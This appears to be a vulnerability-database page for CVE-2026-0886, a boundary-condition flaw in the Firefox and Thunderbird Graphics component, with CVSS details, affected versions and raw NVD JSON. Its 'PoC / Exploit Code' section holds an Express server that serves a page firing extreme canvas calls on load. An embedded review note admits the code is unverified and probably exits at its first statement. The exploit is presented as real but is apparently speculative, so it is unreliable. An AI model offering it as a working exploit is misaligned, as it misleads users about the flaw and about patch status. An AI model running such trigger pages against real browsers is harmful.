Security Vulnerability Report
CVE-2026-0886 CVSS 5.3 MEDIUM

CVE-2026-0886

Published: 2026-01-13 14:16:39
Last Modified: 2026-04-13 15:17:18

Description

Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

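cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions before 115.32.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* (versions before 147.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions from 128.0 up to, but not including, 140.7.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* (versions before 140.7.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* (versions before 147.0) - VULNERABLE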
Mozilla Firefox < 147
Mozilla Firefox ESR 115.x < 115.32
Mozilla Firefox ESR 140.x < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
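// CVE-2026-0886 PoC - Graphics Component Boundary Condition
// Target: Firefox < 147, Firefox ESR < 115.32/140.7, Thunderbird < 147/140.7
//
// NOTE(review): this listing is unverified. The public description only says
// "incorrect boundary conditions in the Graphics component", and the bug
// reference listed for this CVE is tagged "Permissions Required", so nothing
// on this page shows that the canvas calls below reach the code that was
// fixed. A zero-sized createImageData() is specified to throw IndexSizeError,
// so the try block in the served page is expected to exit at its first
// statement and only log an error.
//
// Do not use the outcome of this page to decide whether a browser is patched:
// a run that does nothing proves nothing. Compare the installed version with
// the fixed releases instead (Firefox 147, Firefox ESR 115.32 / 140.7,
// Thunderbird 147 / 140.7).
const express = require('express');

const app = express();

/**
 * GET / - serves a single static HTML page holding a <canvas> and an inline
 * script. The page is built from a constant template; no request data is
 * interpolated into it.
 */
app.get('/', (req, res) => {
  // Generate malicious HTML page to trigger boundary condition
  const pocHtml = `
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2026-0886 PoC</title>
</head>
<body>
  <canvas id="targetCanvas" width="800" height="600"></canvas>
  <script>
    const canvas = document.getElementById('targetCanvas');
    const ctx = canvas.getContext('2d');

    // Trigger boundary condition in Graphics component
    // by manipulating canvas operations with edge cases
    function triggerVulnerability() {
      try {
        // Create extreme canvas operations
        const imgData = ctx.createImageData(0, 0);

        // Trigger with manipulated image data dimensions
        const maliciousData = ctx.createImageData(
          Number.MAX_SAFE_INTEGER,
          Number.MAX_SAFE_INTEGER
        );

        // Attempt to process with boundary overflow
        ctx.putImageData(maliciousData, -2147483648, -2147483648);

        // Additional trigger vectors
        for (let i = 0; i < 100; i++) {
          ctx.drawImage(canvas,
            Math.random() * 1000 - 500,
            Math.random() * 1000 - 500,
            Number.MAX_VALUE,
            Number.MAX_VALUE
          );
        }

        console.log('Vulnerability trigger attempted');
      } catch (e) {
        console.error('Error:', e.message);
      }
    }

    // Auto-trigger on page load
    window.onload = function() {
      setTimeout(triggerVulnerability, 1000);
    };
  </script>
</body>
</html>
`;

  res.send(pocHtml);
});

// Bind to the loopback interface only. Without a host argument the server
// listens on every interface, which would offer the test page to any machine
// that can reach this one; the localhost URL printed below keeps working.
app.listen(8080, '127.0.0.1', () => {
  console.log('CVE-2026-0886 PoC Server running on port 8080');
  console.log('Navigate to http://localhost:8080 to trigger vulnerability');
});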

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0886", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:39.140", "lastModified": "2026-04-13T15:17:17.743", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Condiciones de contorno incorrectas en el componente Gráficos. Esta vulnerabilidad afecta a Firefox &lt; 147, Firefox ESR &lt; 115.32, Firefox ESR &lt; 140.7, Thunderbird &lt; 147 y Thunderbird &lt; 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2005658", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}